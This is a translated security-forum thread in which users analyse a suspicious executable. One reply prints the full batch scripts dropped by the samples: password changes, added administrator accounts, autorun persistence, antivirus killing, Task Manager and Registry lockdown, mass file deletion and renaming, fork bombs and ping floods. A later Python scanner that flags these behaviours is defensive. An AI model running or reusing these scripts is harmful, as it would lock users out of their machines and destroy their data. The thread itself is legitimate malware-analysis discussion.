Thread starter: 安全守护者

[Suspicious file] Everyone, test this and analyze its behaviour

安全守护者
OP | Posted 2018-1-7 12:39:59
Juno_Jr. posted on 2018-1-7 12:35:
Isn't it already written quite plainly in Habo..

If you use Habo, you already get every action; what else is there to say?
Juno_Jr.
Posted 2018-1-7 12:41:22
安全守护者 posted on 2018-1-7 12:39:
If you use Habo, you already get every action; what else is there to say?

....You're the one who posted the Habo report... I just opened it and had a look.
remiliacn
Posted 2018-1-7 13:04:37
Programs invoked: net.exe
reg.exe
shutdown.exe
attrib.exe

Main malicious behaviours:
Changes the password
Disables Task Manager
Disables the desktop
Disables the Registry editor
Modifies and hides autoexec.bat (attrib +r +s +h)

Avast kills it on download

学雷锋做人
Posted 2018-1-7 13:06:08
Habo's behaviour report already sums it up fully. File_Analysis has promptly updated the 2.3.0.0 rule file, fixing the bug where this sample's process creation made it run out of control.
Juno_Jr.
Posted 2018-1-7 13:06:25
This post was last edited by Juno_Jr. on 2018-1-7 14:47
安全守护者 posted on 2018-1-7 12:39:
If you use Habo, you already get every action; what else is there to say?

Adding the files it drops. There are a few more exes; they don't have much privilege, so I couldn't be bothered to upload them. Having nothing better to do, I looked through all the exes.
They all drop a bat and execute it.
Main file:
@Shift /0
@echo off
net user %username% bc555b6323514bf87e600a182db70d00
cd\
net user YOURS PC IS OVER lovechina /add
net localgroup Administrators YOURS PC IS OVER /add
net user YOURS PC IS OVER /active:yes
shutdown -r -t 3
copy %0 C:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动\a.bat
copy %0 c:\autoexec.bat
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
attrib autoexec.bat +r +s +h
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v norun /t reg_dword /d 00000001 /f
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nodrives /t reg_dword /d 429467295 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f
rd /q/s "%~d0"
type "%~f0" >> "%~f0"
cd\
for /f "delims=" %%i in ('dir /s .') do @ren %%i *.jpg
exit/b
md d:\fly >nul 2>nul
set a=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
for %%a in (%a%) do subst %%a: d:\fly >nul 2>nul
if not exist "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat"
copy %~fs0 "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat">nul
echo
@echo off>%windir%\power.bat
echo if "%%1"=="" goto :end>>%windir%\power.bat
echo if exist C:\_stop goto :EOF>>%windir%\power.bat
echo start /B %%~fs0 exp>>%windir%\power.bat
echo :s>>%windir%\power.bat
echo if not exist C:\_stop goto s>>%windir%\power.bat
echo exit>>%windir%\power.bat
echo :end>>%windir%\power.bat
echo del %%~fs0>>%windir%\power.bat
echo set ws=CreateObject("W.Shell")>%windir%\power.vbs
echo ws.Run "%windir%\power.bat exp",0 >>%windir%\power.vbs
W %windir%\power.vbs
del %windir%\power.vbs
set p=%~ps0
if not %p:~-3,2%==启动 del %~fs0
:x
taskkill /f /im cmd.EⅩE
goto x
set a=0
:22
set /a a=%a%+1
echo laji >C:\%a%.txt
goto 22
start Speed.bat
ping www.bayuxuexiao.com -l 65500 -t
%0
tracert bbs.huorong.cn
tracert www.xyyao.com
tracert bbs.kafan.cn
tracert www.bayuxuexiao.com
tracert www.bayuxuexiao.net


KO.EXE
@shift /0
@shift /0
@echo off
title 金山卫士安装程序
set taskkill=s
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat +r +s +h
net stop sharedaccess >nul
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
net stop Shadow" "System" "Service
set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nul
rem Modify the registry......
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t REG_DWORD /d 00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 4294967295 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t REG_DWORD /d 00000002 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d 00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d 00000001 /f >nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
No <truncated>


网络测试2.0.exe
@shift /0
@echo off
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v lin /t REG_SZ /d *:\1.bat /f
@ping www.bayuxuexiao.net
(A long stretch in the middle is nothing but @ping www.bayuxuexiao.net)
@ping www.bayuxuexiao.net
net user administrator 4746510644db23a6a68372b5bced8f45


360一键安装.exe
@shift /0
@ECHO OFF
title 垃圾清理
echo 垃圾清理
pause
ntsd -c q -pn smss.exe
shutdown -a
net user %username% /add
NET LOCALGROUP ADMINISTRATORS %username% /add
set a=0
:22
set /a a=%a%+1
echo laji >C:\%a%.txt
goto 22
net user
%0
cd\
  for /f "delims=" %%i in ('dir /s .') do @ren %%i *.jpg
  exit/b
  for /l %%i in (0,1,254) do start %%i
MD d:\fly >nul 2>nul
  set a=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
  for %%a in (%a%) do subst %%a: d:\fly >nul 2>nul
ping 127.1 -n 5 >nul
if not exist "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat" copy %~fs0 "%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat">nul
  echo @echo off>%windir%\power.bat
  echo if "%%1"=="" goto :end>>%windir%\power.bat
  echo if exist C:\_stop goto :EOF>>%windir%\power.bat
  echo start /B %%~fs0 exp>>%windir%\power.bat
  echo :s>>%windir%\power.bat
  echo if not exist C:\_stop goto s>>%windir%\power.bat
  echo exit>>%windir%\power.bat
  echo :end>>%windir%\power.bat
  echo del %%~fs0>>%windir%\power.bat
  echo set ws=CreateObject("W.Shell")>%windir%\power.vbs
  echo ws.Run "%windir%\power.bat exp",0 >>%windir%\power.vbs
  W %windir%\power.vbs
  del %windir%\power.vbs
  set p=%~ps0
  if not %p:~-3,2%==启动 del %~fs0
  :x
  taskkill /f /im cmd.EⅩE
  goto x
:p
  echo start C:\1.bat >> C:\1.bat
  start C:\1.bat
  goto p
  :loop
  start "" "%systemdrive%\program files\internet explorer\iexplore.EⅩE" -k "blank"
  goto loop
copy %0 "%userprofile%\「开始」菜单\程序\启动\1.bat"
  @reg??add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
  echo rd %windei%/windos /s /q & goto 1>d:\explorer.bat
  echo :1>>d:\explorer.bat
  echo del d:\*.EXE /f /s /q>>d:\explorer.bat
  echo del e:\*.EXE /f /s /q>>d:\explorer.bat
  start d:\explorer.bat
  exit
 reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v noviewcontextmenu /t reg_dword /d 00000001 /f
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v
  restrictrun /t reg_dword /d 00000001 /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d 00000001 /f
eg add
  hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nodrives /t reg_dword /d 429467295 /f
reg add
  hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v norun /t reg_dword /d 00000001 /f
shutdown -r -t 3
  copy %0 C:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动\a.bat
  copy %0 c:\autoexec.bat
  REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
  REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
  attrib autoexec.bat +r +s +h
  REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f
  del %0
exit


Excel.exe
Used for infection



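Added example (my own code, not anything posted in this thread): a small Python triage pass that scans a dropped batch script line by line for the behaviours remiliacn listed and that are visible in the scripts above (password change, account creation, Run-key and autoexec.bat persistence, Task Manager/Registry policy lockdown). The indicator regexes and the is_lockdown rule are my own assumptions, not a product rule set; the sample input is a few lines copied from the main file above.

```python
import re

# Indicator table (constructed for this example from the behaviours named in the
# thread: password change, account creation, policy lockdown, persistence).
# Each entry: (behaviour label, regex matched against one line of the batch file).
INDICATORS = [
    ("changes account password", re.compile(r"^\s*net\s+user\s+\S+\s+(?!/)\S+\s*$", re.I)),
    ("adds local account", re.compile(r"\bnet\s+user\b.*\s/add\b", re.I)),
    ("adds account to Administrators", re.compile(r"\bnet\s+localgroup\s+administrators\b.*\s/add\b", re.I)),
    ("copies itself to autoexec.bat", re.compile(r"\bcopy\s+%0\b.*autoexec\.bat", re.I)),
    ("hides autoexec.bat", re.compile(r"\battrib\b.*autoexec\.bat.*\+h", re.I)),
    ("Run-key persistence", re.compile(r"\breg\s+add\b.*\\CurrentVersion\\Run(Once)?\b", re.I)),
    ("disables Task Manager", re.compile(r"\bDisableTaskMgr\b", re.I)),
    ("disables Registry tools", re.compile(r"\bDisableRegistryTools\b", re.I)),
    ("hides desktop", re.compile(r"\bNoDesktop\b", re.I)),
    ("hides drives", re.compile(r"\bNoDrives\b", re.I)),
    ("forced reboot", re.compile(r"\bshutdown\b.*\s-r\b", re.I)),
]

# Constructed sample: a handful of lines taken from the "main file" script posted above.
SAMPLE = r"""@echo off
net user %username% bc555b6323514bf87e600a182db70d00
net user YOURS PC IS OVER lovechina /add
net localgroup Administrators YOURS PC IS OVER /add
shutdown -r -t 3
copy %0 c:\autoexec.bat
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
attrib autoexec.bat +r +s +h
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f
"""


def triage(script: str) -> dict:
    """Return {behaviour label: [1-based line numbers]} for every indicator that fires."""
    hits: dict = {}
    for lineno, line in enumerate(script.splitlines(), 1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                hits.setdefault(label, []).append(lineno)
    return hits


def is_lockdown(hits: dict) -> bool:
    """True when the script both persists and tampers with an account or a UI policy."""
    persists = {"Run-key persistence", "copies itself to autoexec.bat"} & set(hits)
    tampers = {"changes account password", "adds account to Administrators",
               "disables Task Manager", "disables Registry tools"} & set(hits)
    return bool(persists and tampers)


if __name__ == "__main__":
    report = triage(SAMPLE)
    for label, lines in report.items():
        print(f"{label}: lines {lines}")
    print("lockdown pattern:", is_lockdown(report))
```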
安全守护者
OP | Posted 2018-1-7 14:03:16
学雷锋做人 posted on 2018-1-7 13:06:
Habo's behaviour report already sums it up fully. File_Analysis has promptly updated the 2.3.0.0 rule file, fixing the bug where this sample's process creation made it run out of control.

So with the previous rules, opening this program would have wrecked the system?
540923555
Posted 2018-1-7 15:47:33
安全守护者 posted on 2018-1-6 13:59:
CylanceUnsafe
JiangminWorm.Generic.dwh
K7AntiVirusTrojan ( 0051918e1 )

Looks like I don't need to test WD then
瑞星之剑
Posted 2018-1-7 15:59:23 from mobile
2605276004x posted on 2018-1-6 13:31:
A virus that can't trigger Kaspersky's proactive defense isn't a good virus

666
学雷锋做人
Posted 2018-1-7 19:36:11
安全守护者 posted on 2018-1-7 14:03:
So with the previous rules, opening this program would have wrecked the system?

There was an oversight in the earlier rules: dangerous behaviour was allowed by default.
Copyright © KaFan  KaFan.cn All Rights Reserved.